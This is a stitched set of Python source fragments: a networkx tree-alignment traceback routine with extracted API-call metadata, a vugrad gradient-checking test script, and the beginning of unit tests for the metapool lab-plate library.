self._setT(i, j, tdistance)
self._settraceT(i, j, ttrace)
def _traceback(self):
G = nx.DiGraph()
G.add_node("tempnode")
parent = "tempnode"
stack = deque()
stack.append(
(self.__postorder1[-1], self.__postorder2[-1], parent))
while len(stack) != 0:
i, j, parent = stack.pop()
if i == "#" and j == "#":
continue
elif i == "#":
if j != "#":
H = nx.dfs_tree(self.__tree2, j)
G = nx.compose(G, H)
G.add_edge(parent, j)
G = nx.relabel_nodes(
G, dict(zip(list(H.nodes), [("#", k) for k in H.nodes])))
continue
elif j == "#":
if i != "#":
H = nx.dfs_tree(self.__tree1, i)
G = nx.compose(G, H)
G.add_edge(parent, i)
G = nx.relabel_nodes(
G, dict(zip(list(H.nodes), [(k, "#") for k in H.nodes])))
continue
elif i != "#" and j != "#":
tree_result = self.__tracetree.loc[i, j]
forest_result = self.__traceforest.loc[i, j]
if tree_result[0] == 0:
if tree_result[1][0] == "#" and tree_result[1][1] != "#":
H = nx.dfs_tree(self.__tree2,
source=tree_result[1][1])
Hprime = nx.dfs_tree(
self.__tree2, source=tree_result[2][1])
H.remove_nodes_from(list(Hprime.nodes))
G = nx.compose(G, H)
G.add_edge(parent, tree_result[1][1])
G = nx.relabel_nodes(
G, dict(zip(list(H.nodes), [("#", k) for k in H.nodes])))
elif tree_result[1][0] != "#" and tree_result[1][1] == "#":
H = nx.dfs_tree(self.__tree1,
source=tree_result[1][0])
Hprime = nx.dfs_tree(
self.__tree1, source=tree_result[2][0])
H.remove_nodes_from(list(Hprime.nodes))
G = nx.compose(G, H)
G.add_edge(parent, tree_result[1][0])
G = nx.relabel_nodes(
G, dict(zip(list(H.nodes), [(k, "#") for k in H.nodes])))
stack.append(
[tree_result[2][0], tree_result[2][1], tree_result[1]])
elif tree_result[0] == 1:
G.add_node(tree_result[1])
G.add_edge(parent, tree_result[1])
foreststack = deque()
foreststack.append([i, j, (i, j)])
while len(foreststack) != 0:
i_f, j_f, p_f = foreststack.pop()
if i_f == "#" and j_f == "#":
continue
elif i_f == "#":
if j_f != "#":
for j_tmp in j_f:
H = nx.dfs_tree(
self.__tree2, source=j_tmp)
G = nx.compose(G, H)
G.add_edge(p_f, j_tmp)
G = nx.relabel_nodes(
G, dict(zip(list(H.nodes), [("#", k) for k in H.nodes])))
elif j_f == "#":
if i_f != "#":
for i_tmp in i_f:
H = nx.dfs_tree(
self.__tree1, source=i_tmp)
G = nx.compose(G, H)
G.add_edge(p_f, i_tmp)
G = nx.relabel_nodes(
G, dict(zip(list(H.nodes), [(k, "#") for k in H.nodes])))
elif i_f != "#" and j_f != "#":
i_f = "{}".format(i_f)
j_f = "{}".format(j_f)
forest_result = self.__traceforest.loc[i_f, j_f]
if forest_result[0] == 1:
stack.append(
[forest_result[2][0], forest_result[2][1], p_f])
foreststack.append(
[forest_result[1][0], forest_result[1][1], p_f])
elif forest_result[0] == 2:
foreststack.append(
[forest_result[1][0][0], forest_result[1][0][1], p_f])
if forest_result[1][1][1] != "#":
G.add_node(forest_result[2])
G.add_edge(p_f, forest_result[2])
foreststack.append(
[forest_result[1][1][0], forest_result[1][1][1], forest_result[2]])
elif forest_result[1][1][1] == "#":
H = nx.dfs_tree(
self.__tree1, forest_result[1][1][0])
G = nx.compose(G, H)
G.add_edge(p_f, forest_result[1][1][0])
G = nx.relabel_nodes(
G, dict(zip(list(H.nodes), [(k, "#") for k in H.nodes])))
elif forest_result[0] == 3:
foreststack.append(
[forest_result[1][0][0], forest_result[1][0][1], p_f])
if forest_result[1][1][0] != "#":
G.add_node(forest_result[2])
G.add_edge(p_f, forest_result[2])
foreststack.append(
[forest_result[1][1][0], forest_result[1][1][1], forest_result[2]])
elif forest_result[1][1][0] == "#":
H = nx.dfs_tree(
self.__tree2, forest_result[1][1][1])
G = nx.compose(G, H)
G.add_edge(p_f, forest_result[1][1][1])
G = nx.relabel_nodes(
G, dict(zip(list(H.nodes), [("#", k) for k in H.nodes])))
G.remove_node("tempnode")
alignmentcost = self.__treedistance.loc[self.__postorder1[-1],
self.__postorder2[-1]]
self.__alignmentcost = alignmentcost/len(G)
return G
| [
"pandas.DataFrame",
"scanpy.pp.highly_variable_genes",
"numpy.empty",
"networkx.dfs_tree",
"networkx.topological_sort",
"networkx.shortest_path",
"itertools.combinations",
"numpy.vstack",
"numpy.array",
"networkx.compose",
"networkx.convert_matrix.from_pandas_adjacency",
"networkx.DiGraph",
... | [((854, 887), 'numpy.array', 'np.array', (['gene_list'], {'dtype': 'object'}), '(gene_list, dtype=object)\n', (862, 887), True, 'import numpy as np\n'), ((955, 988), 'numpy.array', 'np.array', (['gene_list'], {'dtype': 'object'}), '(gene_list, dtype=object)\n', (963, 988), True, 'import numpy as np\n'), ((2352, 2459), 'networkx.convert_matrix.from_pandas_adjacency', 'nx.convert_matrix.from_pandas_adjacency', (["data1.uns['capital']['tree']['tree']"], {'create_using': 'nx.DiGraph'}), "(data1.uns['capital']['tree']['tree'\n ], create_using=nx.DiGraph)\n", (2391, 2459), True, 'import networkx as nx\n'), ((2633, 2740), 'networkx.convert_matrix.from_pandas_adjacency', 'nx.convert_matrix.from_pandas_adjacency', (["data2.uns['capital']['tree']['tree']"], {'create_using': 'nx.DiGraph'}), "(data2.uns['capital']['tree']['tree'\n ], create_using=nx.DiGraph)\n", (2672, 2740), True, 'import networkx as nx\n'), ((4188, 4232), 'pandas.DataFrame', 'pd.DataFrame', ([], {'index': 'forest1', 'columns': 'forest2'}), '(index=forest1, columns=forest2)\n', (4200, 4232), True, 'import pandas as pd\n'), ((4522, 4566), 'pandas.DataFrame', 'pd.DataFrame', ([], {'index': 'forest1', 'columns': 'forest2'}), '(index=forest1, columns=forest2)\n', (4534, 4566), True, 'import pandas as pd\n'), ((8502, 8537), 'numpy.empty', 'np.empty', (['(0, filtered_data.n_vars)'], {}), '((0, filtered_data.n_vars))\n', (8510, 8537), True, 'import numpy as np\n'), ((8964, 9056), 'pandas.DataFrame', 'pd.DataFrame', (['cluster_centroid_data'], {'index': 'clustername', 'columns': 'filtered_data.var_names'}), '(cluster_centroid_data, index=clustername, columns=\n filtered_data.var_names)\n', (8976, 9056), True, 'import pandas as pd\n'), ((18381, 18417), 'numpy.array', 'np.array', (['distancelist'], {'dtype': 'object'}), '(distancelist, dtype=object)\n', (18389, 18417), True, 'import numpy as np\n'), ((19071, 19146), 'numpy.warnings.filterwarnings', 'np.warnings.filterwarnings', (['"""ignore"""'], {'category': 
'np.VisibleDeprecationWarning'}), "('ignore', category=np.VisibleDeprecationWarning)\n", (19097, 19146), True, 'import numpy as np\n'), ((21509, 21521), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (21519, 21521), True, 'import networkx as nx\n'), ((21597, 21604), 'collections.deque', 'deque', ([], {}), '()\n', (21602, 21604), False, 'from collections import deque\n'), ((1927, 1970), 'numpy.array', 'np.array', (['[self.__alignmentcost]'], {'dtype': 'int'}), '([self.__alignmentcost], dtype=int)\n', (1935, 1970), True, 'import numpy as np\n'), ((1984, 2017), 'numpy.array', 'np.array', (['gene_list'], {'dtype': 'object'}), '(gene_list, dtype=object)\n', (1992, 2017), True, 'import numpy as np\n'), ((7148, 7200), 'scanpy.pp.highly_variable_genes', 'sc.pp.highly_variable_genes', (['adata1'], {'n_top_genes': 'N_1'}), '(adata1, n_top_genes=N_1)\n', (7175, 7200), True, 'import scanpy as sc\n'), ((7390, 7442), 'scanpy.pp.highly_variable_genes', 'sc.pp.highly_variable_genes', (['adata2'], {'n_top_genes': 'N_2'}), '(adata2, n_top_genes=N_2)\n', (7417, 7442), True, 'import scanpy as sc\n'), ((8854, 8906), 'numpy.vstack', 'np.vstack', (['(cluster_centroid_data, a_cluster_median)'], {}), '((cluster_centroid_data, a_cluster_median))\n', (8863, 8906), True, 'import numpy as np\n'), ((1152, 1184), 'networkx.topological_sort', 'nx.topological_sort', (['alignedtree'], {}), '(alignedtree)\n', (1171, 1184), True, 'import networkx as nx\n'), ((1315, 1377), 'networkx.shortest_path', 'nx.shortest_path', (['alignedtree'], {'source': 'source_node', 'target': 'node'}), '(alignedtree, source=source_node, target=node)\n', (1331, 1377), True, 'import networkx as nx\n'), ((13877, 13905), 'itertools.combinations', 'itertools.combinations', (['B', 'm'], {}), '(B, m)\n', (13899, 13905), False, 'import itertools\n'), ((15663, 15691), 'itertools.combinations', 'itertools.combinations', (['A', 'm'], {}), '(A, m)\n', (15685, 15691), False, 'import itertools\n'), ((17279, 17321), 'numpy.array', 
'np.array', (['[min1, min2, min3]'], {'dtype': 'object'}), '([min1, min2, min3], dtype=object)\n', (17287, 17321), True, 'import numpy as np\n'), ((19549, 19625), 'pandas.DataFrame', 'pd.DataFrame', (["{'A': cluster_centroid1.loc[i], 'B': cluster_centroid2.loc[j]}"], {}), "({'A': cluster_centroid1.loc[i], 'B': cluster_centroid2.loc[j]})\n", (19561, 19625), True, 'import pandas as pd\n'), ((3141, 3173), 'itertools.combinations', 'itertools.combinations', (['child', '(1)'], {}), '(child, 1)\n', (3163, 3173), False, 'import itertools\n'), ((3587, 3619), 'itertools.combinations', 'itertools.combinations', (['child', '(1)'], {}), '(child, 1)\n', (3609, 3619), False, 'import itertools\n'), ((17369, 17411), 'numpy.array', 'np.array', (['[min1, min2, min3]'], {'dtype': 'object'}), '([min1, min2, min3], dtype=object)\n', (17377, 17411), True, 'import numpy as np\n'), ((5477, 5514), 'itertools.combinations', 'itertools.combinations', (['successors', 'k'], {}), '(successors, k)\n', (5499, 5514), False, 'import itertools\n'), ((6323, 6360), 'itertools.combinations', 'itertools.combinations', (['successors', 'k'], {}), '(successors, k)\n', (6345, 6360), False, 'import itertools\n'), ((21911, 21939), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree2', 'j'], {}), '(self.__tree2, j)\n', (21922, 21939), True, 'import networkx as nx\n'), ((21964, 21980), 'networkx.compose', 'nx.compose', (['G', 'H'], {}), '(G, H)\n', (21974, 21980), True, 'import networkx as nx\n'), ((3346, 3378), 'itertools.combinations', 'itertools.combinations', (['child', 'k'], {}), '(child, k)\n', (3368, 3378), False, 'import itertools\n'), ((3792, 3824), 'itertools.combinations', 'itertools.combinations', (['child', 'k'], {}), '(child, k)\n', (3814, 3824), False, 'import itertools\n'), ((22253, 22281), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree1', 'i'], {}), '(self.__tree1, i)\n', (22264, 22281), True, 'import networkx as nx\n'), ((22306, 22322), 'networkx.compose', 'nx.compose', (['G', 'H'], {}), 
'(G, H)\n', (22316, 22322), True, 'import networkx as nx\n'), ((20158, 20195), 'itertools.combinations', 'itertools.combinations', (['successor1', 'm'], {}), '(successor1, m)\n', (20180, 20195), False, 'import itertools\n'), ((20766, 20803), 'itertools.combinations', 'itertools.combinations', (['successor2', 'm'], {}), '(successor2, m)\n', (20788, 20803), False, 'import itertools\n'), ((22820, 22871), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree2'], {'source': 'tree_result[1][1]'}), '(self.__tree2, source=tree_result[1][1])\n', (22831, 22871), True, 'import networkx as nx\n'), ((22945, 22996), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree2'], {'source': 'tree_result[2][1]'}), '(self.__tree2, source=tree_result[2][1])\n', (22956, 22996), True, 'import networkx as nx\n'), ((23118, 23134), 'networkx.compose', 'nx.compose', (['G', 'H'], {}), '(G, H)\n', (23128, 23134), True, 'import networkx as nx\n'), ((24242, 24249), 'collections.deque', 'deque', ([], {}), '()\n', (24247, 24249), False, 'from collections import deque\n'), ((23438, 23489), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree1'], {'source': 'tree_result[1][0]'}), '(self.__tree1, source=tree_result[1][0])\n', (23449, 23489), True, 'import networkx as nx\n'), ((23563, 23614), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree1'], {'source': 'tree_result[2][0]'}), '(self.__tree1, source=tree_result[2][0])\n', (23574, 23614), True, 'import networkx as nx\n'), ((23736, 23752), 'networkx.compose', 'nx.compose', (['G', 'H'], {}), '(G, H)\n', (23746, 23752), True, 'import networkx as nx\n'), ((24680, 24719), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree2'], {'source': 'j_tmp'}), '(self.__tree2, source=j_tmp)\n', (24691, 24719), True, 'import networkx as nx\n'), ((24801, 24817), 'networkx.compose', 'nx.compose', (['G', 'H'], {}), '(G, H)\n', (24811, 24817), True, 'import networkx as nx\n'), ((25208, 25247), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree1'], {'source': 'i_tmp'}), 
'(self.__tree1, source=i_tmp)\n', (25219, 25247), True, 'import networkx as nx\n'), ((25329, 25345), 'networkx.compose', 'nx.compose', (['G', 'H'], {}), '(G, H)\n', (25339, 25345), True, 'import networkx as nx\n'), ((26795, 26844), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree1', 'forest_result[1][1][0]'], {}), '(self.__tree1, forest_result[1][1][0])\n', (26806, 26844), True, 'import networkx as nx\n'), ((26926, 26942), 'networkx.compose', 'nx.compose', (['G', 'H'], {}), '(G, H)\n', (26936, 26942), True, 'import networkx as nx\n'), ((27850, 27899), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree2', 'forest_result[1][1][1]'], {}), '(self.__tree2, forest_result[1][1][1])\n', (27861, 27899), True, 'import networkx as nx\n'), ((27981, 27997), 'networkx.compose', 'nx.compose', (['G', 'H'], {}), '(G, H)\n', (27991, 27997), True, 'import networkx as nx\n')] |
import _context
import unittest
import torch
from torch import nn
import vugrad as vg
import numpy as np
"""
This is mostly a collection of test code at the moment, rather than a proper suite of unit tests.
"""
def fd_mlp():
    """
    Sanity-check backprop on an MLP: compare the backprop gradient of a
    single parameter entry against a finite-differences estimate.
    :return:
    """
    idx = (0, 0)  # which entry of the first parameter tensor to probe

    (xtrain, ytrain), (xval, yval), num_classes = vg.load_synth()

    # Take a small batch with its targets, and wrap the inputs in a Node
    batch, targets = xtrain[:100, :], ytrain[:100]
    batch = vg.TensorNode(value=batch)

    num_instances, num_features = xtrain.shape
    mlp = vg.MLP(input_size=num_features, output_size=num_classes)

    parm = mlp.parameters()[0]

    # Backprop derivative at the probed entry
    outputs0 = mlp(batch)
    loss0 = vg.celoss(outputs0, targets)
    loss0.backward()
    bp_deriv = parm.grad[idx]

    # Perturb the parameter and recompute the loss for the FD estimate
    eps = max(1.5e-8 * parm.value[idx], 10e-12)
    parm.value[idx] += eps

    outputs1 = mlp(batch)
    loss1 = vg.celoss(outputs1, targets)

    fd_deriv = (loss1.value - loss0.value) / eps

    print(f'finite differences: {fd_deriv:.3}')
    print(f' backprop: {bp_deriv:.3}')
def finite_differences(function, input='eye'):
    """
    Test the framework by computing a finite-differences approximation to the
    gradient and comparing it, element by element, to the backprop gradient.

    :param function: Some function that takes a matrix and returns a scalar
        (using Ops).
    :param input: Either an ndarray to use as the input, or one of the
        strings 'eye' (identity matrix) or 'rand' (standard-normal matrix).
    :return:
    """
    N = 5

    # -- `isinstance` instead of `type(...) == str` so that str subclasses
    #    are handled correctly.
    if isinstance(input, str):
        if input == 'eye':
            inp = vg.TensorNode(np.eye(N))
        elif input == 'rand':
            inp = vg.TensorNode(np.random.randn(N, N))
        else:
            # ValueError is a subclass of Exception, so existing callers
            # catching the old bare Exception still work.
            raise ValueError(f'unknown input specifier: {input!r}')
    else:
        inp = vg.TensorNode(input)

    N, M = inp.size()

    for i in range(N):
        for j in range(M):
            eps = max(1.5e-8 * inp.value[i, j], 10e-12)
            # -- This is supposedly a good epsilon value to use.

            # Backprop derivative for element (i, j)
            loss0 = function(inp)
            loss0.backward()
            bp_deriv = inp.grad[i, j]

            # Perturb a *copy* of the input and recompute the loss
            inpe = vg.TensorNode(inp.value.copy())
            inpe.value[i, j] += eps
            loss1 = function(inpe)

            fd_deriv = (loss1.value - loss0.value) / eps

            print(i, j)
            print(f' finite differences: {fd_deriv:.3}')
            print(f' backprop: {bp_deriv:.3}')

            # Reset gradients and free both computation graphs before the
            # next element.
            loss0.zero_grad()
            loss1.zero_grad()
            loss0.clear()
            loss1.clear()
class TestUtil(unittest.TestCase):
    """
    Finite-difference sanity checks for the vugrad ops.
    """

    def test_fd0(self):
        """
        Test the backprop using finite differences: plain sum.
        :return:
        """
        finite_differences(lambda x: vg.Sum.do_forward(x))

    def test_fd1(self):
        """
        Test the backprop using finite differences: sum(sigmoid(x)).
        :return:
        """
        finite_differences(
            lambda x: vg.Sum.do_forward(vg.Sigmoid.do_forward(x)),
            input='rand')

    def test_fd2(self):
        """
        Test the backprop using finite differences: sum(sigmoid(x @ x)).
        :return:
        """
        def fn(x):
            product = vg.MatrixMultiply.do_forward(x, x)
            return vg.Sum.do_forward(vg.Sigmoid.do_forward(product))

        finite_differences(input='rand', function=fn)

    def test_fd3(self):
        """
        Test the backprop using finite differences: sum(normalize(exp(x))).
        :return:
        """
        def fn(x):
            return vg.Sum.do_forward(
                vg.Normalize.do_forward(vg.Exp.do_forward(x)))

        finite_differences(
            input=np.asarray([[0.6931471805599453, 0.0]]),
            function=fn)

    def test_mlp(self):
        fd_mlp()
"vugrad.Exp.do_forward",
"vugrad.load_synth",
"numpy.random.randn",
"vugrad.MatrixMultiply.do_forward",
"numpy.asarray",
"vugrad.MLP",
"vugrad.TensorNode",
"vugrad.Sum.do_forward",
"vugrad.Sigmoid.do_forward",
"numpy.eye",
"vugrad.celoss",
"vugrad.Normalize.do_forward"
] | [((436, 451), 'vugrad.load_synth', 'vg.load_synth', ([], {}), '()\n', (449, 451), True, 'import vugrad as vg\n'), ((609, 635), 'vugrad.TensorNode', 'vg.TensorNode', ([], {'value': 'batch'}), '(value=batch)\n', (622, 635), True, 'import vugrad as vg\n'), ((694, 750), 'vugrad.MLP', 'vg.MLP', ([], {'input_size': 'num_features', 'output_size': 'num_classes'}), '(input_size=num_features, output_size=num_classes)\n', (700, 750), True, 'import vugrad as vg\n'), ((822, 850), 'vugrad.celoss', 'vg.celoss', (['outputs0', 'targets'], {}), '(outputs0, targets)\n', (831, 850), True, 'import vugrad as vg\n'), ((1019, 1047), 'vugrad.celoss', 'vg.celoss', (['outputs1', 'targets'], {}), '(outputs1, targets)\n', (1028, 1047), True, 'import vugrad as vg\n'), ((1710, 1730), 'vugrad.TensorNode', 'vg.TensorNode', (['input'], {}), '(input)\n', (1723, 1730), True, 'import vugrad as vg\n'), ((3390, 3410), 'vugrad.Exp.do_forward', 'vg.Exp.do_forward', (['x'], {}), '(x)\n', (3407, 3410), True, 'import vugrad as vg\n'), ((3427, 3453), 'vugrad.Normalize.do_forward', 'vg.Normalize.do_forward', (['x'], {}), '(x)\n', (3450, 3453), True, 'import vugrad as vg\n'), ((3474, 3494), 'vugrad.Sum.do_forward', 'vg.Sum.do_forward', (['x'], {}), '(x)\n', (3491, 3494), True, 'import vugrad as vg\n'), ((1546, 1555), 'numpy.eye', 'np.eye', (['N'], {}), '(N)\n', (1552, 1555), True, 'import numpy as np\n'), ((2676, 2696), 'vugrad.Sum.do_forward', 'vg.Sum.do_forward', (['x'], {}), '(x)\n', (2693, 2696), True, 'import vugrad as vg\n'), ((3590, 3629), 'numpy.asarray', 'np.asarray', (['[[0.6931471805599453, 0.0]]'], {}), '([[0.6931471805599453, 0.0]])\n', (3600, 3629), True, 'import numpy as np\n'), ((1619, 1640), 'numpy.random.randn', 'np.random.randn', (['N', 'N'], {}), '(N, N)\n', (1634, 1640), True, 'import numpy as np\n'), ((2873, 2897), 'vugrad.Sigmoid.do_forward', 'vg.Sigmoid.do_forward', (['x'], {}), '(x)\n', (2894, 2897), True, 'import vugrad as vg\n'), ((3182, 3216), 'vugrad.MatrixMultiply.do_forward', 
'vg.MatrixMultiply.do_forward', (['x', 'x'], {}), '(x, x)\n', (3210, 3216), True, 'import vugrad as vg\n')] |
from unittest import TestCase, main
import pandas as pd
import numpy as np
import numpy.testing as npt
import os
from io import StringIO
from metapool.metapool import (read_plate_map_csv, read_pico_csv,
calculate_norm_vol, format_dna_norm_picklist,
format_index_picklist,
compute_qpcr_concentration,
compute_shotgun_pooling_values_eqvol,
compute_shotgun_pooling_values_qpcr,
compute_shotgun_pooling_values_qpcr_minvol,
estimate_pool_conc_vol,
format_pooling_echo_pick_list,
make_2D_array, combine_dfs,
add_dna_conc, compute_pico_concentration,
bcl_scrub_name, rc, sequencer_i5_index,
reformat_interleaved_to_columns)
class Tests(TestCase):
def setUp(self):
self.maxDiff = None
self.cp_vals = np.array([[10.14, 7.89, 7.9, 15.48],
[7.86, 8.07, 8.16, 9.64],
[12.29, 7.64, 7.32, 13.74]])
self.dna_vals = np.array([[10.14, 7.89, 7.9, 15.48],
[7.86, 8.07, 8.16, 9.64],
[12.29, 7.64, 7.32, 13.74]])
self.qpcr_conc = \
np.array([[98.14626462, 487.8121413, 484.3480866, 2.183406934],
[498.3536649, 429.0839787, 402.4270321, 140.1601735],
[21.20533391, 582.9456031, 732.2655041, 7.545145988]])
self.pico_conc = \
np.array([[38.4090909, 29.8863636, 29.9242424, 58.6363636],
[29.7727273, 30.5681818, 30.9090909, 36.5151515],
[46.5530303, 28.9393939, 27.7272727, 52.0454545]])
# def test_compute_shotgun_normalization_values(self):
# input_vol = 3.5
# input_dna = 10
# plate_layout = []
# for i in range(4):
# row = []
# for j in range(4):
# row.append({'dna_concentration': 10,
# 'sample_id': "S%s.%s" % (i, j)})
# plate_layout.append(row)
# obs_sample, obs_water = compute_shotgun_normalization_values(
# plate_layout, input_vol, input_dna)
# exp_sample = np.zeros((4, 4), dtype=np.float)
# exp_water = np.zeros((4, 4), dtype=np.float)
# exp_sample.fill(1000)
# exp_water.fill(2500)
# npt.assert_almost_equal(obs_sample, exp_sample)
# npt.assert_almost_equal(obs_water, exp_water)
# # Make sure that we don't go above the limit
# plate_layout[1][1]['dna_concentration'] = 0.25
# obs_sample, obs_water = compute_shotgun_normalization_values(
# plate_layout, input_vol, input_dna)
# exp_sample[1][1] = 3500
# exp_water[1][1] = 0
# npt.assert_almost_equal(obs_sample, exp_sample)
# npt.assert_almost_equal(obs_water, exp_water)
def test_read_plate_map_csv(self):
plate_map_csv = \
'Sample\tRow\tCol\tBlank\n' + \
'sam1\tA\t1\tFalse\n' + \
'sam2\tA\t2\tFalse\n' + \
'blank1\tB\t1\tTrue\n' + \
'sam3\tB\t2\tFalse\n'
plate_map_f = StringIO(plate_map_csv)
exp_plate_df = pd.DataFrame({'Sample': ['sam1', 'sam2', 'blank1',
'sam3'],
'Row': ['A', 'A', 'B', 'B'],
'Col': [1, 2, 1, 2],
'Well': ['A1', 'A2', 'B1', 'B2'],
'Blank': [False, False, True, False]})
obs_plate_df = read_plate_map_csv(plate_map_f)
pd.testing.assert_frame_equal(
obs_plate_df, exp_plate_df, check_like=True)
def test_read_plate_map_csv_remove_empty_wells(self):
plate_map_csv = (
'Sample\tRow\tCol\tBlank\n'
'sam1\tA\t1\tFalse\n'
'sam2\tA\t2\tFalse\n'
'blank1\tB\t1\tTrue\n'
'\tC\t1\tFalse\n'
'\tD\t1\tFalse\n'
'\tE\t1\tFalse\n'
'sam3\tB\t2\tFalse\n'
'\tD\t2\tFalse\n')
plate_map_f = StringIO(plate_map_csv)
exp = pd.DataFrame({'Sample': ['sam1', 'sam2', 'blank1',
'sam3'],
'Row': ['A', 'A', 'B', 'B'],
'Col': [1, 2, 1, 2],
'Well': ['A1', 'A2', 'B1', 'B2'],
'Blank': [False, False, True, False]})
with self.assertWarnsRegex(UserWarning,
'This plate map contains 4 empty wells, '
'these will be ignored'):
obs_plate_df = read_plate_map_csv(plate_map_f)
pd.testing.assert_frame_equal(
obs_plate_df, exp, check_like=True)
def test_read_plate_map_csv_error_repeated_sample_names(self):
plate_map_csv = \
'Sample\tRow\tCol\tBlank\n' + \
'sam1\tA\t1\tFalse\n' + \
'sam2\tA\t2\tFalse\n' + \
'blank1\tB\t1\tTrue\n' + \
'blank1\tB\t4\tTrue\n'
plate_map_f = StringIO(plate_map_csv)
with self.assertRaises(Exception):
read_plate_map_csv(plate_map_f)
def test_read_pico_csv(self):
# Test a normal sheet
pico_csv = '''Results
Well ID\tWell\t[Blanked-RFU]\t[Concentration]
SPL1\tA1\t5243.000\t3.432
SPL2\tA2\t4949.000\t3.239
SPL3\tB1\t15302.000\t10.016
SPL4\tB2\t4039.000\t2.644
Curve2 Fitting Results
Curve Name\tCurve Formula\tA\tB\tR2\tFit F Prob
Curve2\tY=A*X+B\t1.53E+003\t0\t0.995\t?????
'''
exp_pico_df = pd.DataFrame({'Well': ['A1', 'A2', 'B1', 'B2'],
'Sample DNA Concentration':
[3.432, 3.239, 10.016, 2.644]})
pico_csv_f = StringIO(pico_csv)
obs_pico_df = read_pico_csv(pico_csv_f)
pd.testing.assert_frame_equal(
obs_pico_df, exp_pico_df, check_like=True)
# Test a sheet that has some ???? zero values
pico_csv = '''Results
Well ID\tWell\t[Blanked-RFU]\t[Concentration]
SPL1\tA1\t5243.000\t3.432
SPL2\tA2\t4949.000\t3.239
SPL3\tB1\t15302.000\t10.016
SPL4\tB2\t\t?????
Curve2 Fitting Results
Curve Name\tCurve Formula\tA\tB\tR2\tFit F Prob
Curve2\tY=A*X+B\t1.53E+003\t0\t0.995\t?????
'''
exp_pico_df = pd.DataFrame({'Well': ['A1', 'A2', 'B1', 'B2'],
'Sample DNA Concentration':
[3.432, 3.239, 10.016, np.nan]})
pico_csv_f = StringIO(pico_csv)
obs_pico_df = read_pico_csv(pico_csv_f)
pd.testing.assert_frame_equal(
obs_pico_df, exp_pico_df, check_like=True)
def test_read_pico_csv_spectramax(self):
# Test a normal sheet
fp_spectramax = os.path.join(os.path.dirname(__file__), 'data',
'pico_spectramax.txt')
obs_pico_df = read_pico_csv(fp_spectramax,
plate_reader='SpectraMax_i3x')
self.assertEqual(obs_pico_df.shape[0], 384)
self.assertEqual(list(obs_pico_df.columns),
['Well', 'Sample DNA Concentration'])
# Test Invalid plate_reader error
with self.assertRaises(ValueError):
read_pico_csv(fp_spectramax, plate_reader='foo')
def test_calculate_norm_vol(self):
dna_concs = np.array([[2, 7.89],
[np.nan, .0]])
exp_vols = np.array([[2500., 632.5],
[3500., 3500.]])
obs_vols = calculate_norm_vol(dna_concs)
np.testing.assert_allclose(exp_vols, obs_vols)
def test_format_dna_norm_picklist(self):
exp_picklist = (
'Sample\tSource Plate Name\tSource Plate Type\tSource Well\t'
'Concentration\tTransfer Volume\tDestination Plate Name\t'
'Destination Well\n'
'sam1\tWater\t384PP_AQ_BP2_HT\tA1\t2.0\t1000.0\tNormalizedDNA\t'
'A1\n'
'sam2\tWater\t384PP_AQ_BP2_HT\tA2\t7.89\t2867.5\tNormalizedDNA\t'
'A2\n'
'blank1\tWater\t384PP_AQ_BP2_HT\tB1\tnan\t0.0\tNormalizedDNA\t'
'B1\n'
'sam3\tWater\t384PP_AQ_BP2_HT\tB2\t0.0\t0.0\tNormalizedDNA\t'
'B2\n'
'sam1\tSample\t384PP_AQ_BP2_HT\tA1\t2.0\t2500.0\tNormalizedDNA\t'
'A1\n'
'sam2\tSample\t384PP_AQ_BP2_HT\tA2\t7.89\t632.5\tNormalizedDNA\t'
'A2\n'
'blank1\tSample\t384PP_AQ_BP2_HT\tB1\tnan\t3500.0\t'
'NormalizedDNA\tB1\n'
'sam3\tSample\t384PP_AQ_BP2_HT\tB2\t0.0\t3500.0\tNormalizedDNA\t'
'B2')
dna_vols = np.array([[2500., 632.5],
[3500., 3500.]])
water_vols = 3500 - dna_vols
wells = np.array([['A1', 'A2'],
['B1', 'B2']])
sample_names = np.array([['sam1', 'sam2'],
['blank1', 'sam3']])
dna_concs = np.array([[2, 7.89],
[np.nan, .0]])
obs_picklist = format_dna_norm_picklist(dna_vols, water_vols, wells,
sample_names=sample_names,
dna_concs=dna_concs)
self.assertEqual(exp_picklist, obs_picklist)
# test if switching dest wells
exp_picklist = (
'Sample\tSource Plate Name\tSource Plate Type\tSource Well\t'
'Concentration\tTransfer Volume\tDestination Plate Name\t'
'Destination Well\n'
'sam1\tWater\t384PP_AQ_BP2_HT\tA1\t2.0\t1000.0\tNormalizedDNA\t'
'D1\n'
'sam2\tWater\t384PP_AQ_BP2_HT\tA2\t7.89\t2867.5\tNormalizedDNA\t'
'D2\n'
'blank1\tWater\t384PP_AQ_BP2_HT\tB1\tnan\t0.0\tNormalizedDNA\t'
'E1\n'
'sam3\tWater\t384PP_AQ_BP2_HT\tB2\t0.0\t0.0\tNormalizedDNA\t'
'E2\n'
'sam1\tSample\t384PP_AQ_BP2_HT\tA1\t2.0\t2500.0\tNormalizedDNA\t'
'D1\n'
'sam2\tSample\t384PP_AQ_BP2_HT\tA2\t7.89\t632.5\tNormalizedDNA\t'
'D2\n'
'blank1\tSample\t384PP_AQ_BP2_HT\tB1\tnan\t3500.0\tNormalizedDNA\t'
'E1\n'
'sam3\tSample\t384PP_AQ_BP2_HT\tB2\t0.0\t3500.0\tNormalizedDNA\t'
'E2')
dna_vols = np.array([[2500., 632.5],
[3500., 3500.]])
water_vols = 3500 - dna_vols
wells = np.array([['A1', 'A2'],
['B1', 'B2']])
dest_wells = np.array([['D1', 'D2'],
['E1', 'E2']])
sample_names = np.array([['sam1', 'sam2'],
['blank1', 'sam3']])
dna_concs = np.array([[2, 7.89],
[np.nan, .0]])
obs_picklist = format_dna_norm_picklist(dna_vols, water_vols, wells,
dest_wells=dest_wells,
sample_names=sample_names,
dna_concs=dna_concs)
self.assertEqual(exp_picklist, obs_picklist)
# test if switching source plates
exp_picklist = (
'Sample\tSource Plate Name\tSource Plate Type\tSource Well\t'
'Concentration\tTransfer Volume\tDestination Plate Name\t'
'Destination Well\n'
